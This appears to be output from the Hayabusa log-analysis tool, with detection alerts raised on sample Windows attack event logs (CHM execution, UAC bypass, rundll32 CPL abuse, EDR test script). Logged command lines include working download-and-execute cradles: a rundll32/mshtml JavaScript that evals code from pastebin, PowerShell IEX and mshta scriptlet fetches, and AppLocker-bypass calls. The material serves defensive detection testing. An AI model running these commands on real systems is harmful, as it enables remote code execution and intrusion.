16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy 
/Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows 
\System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: 
C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: 
C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil 
Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source 
https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : 
User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe 
javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT 
AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: 
C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 
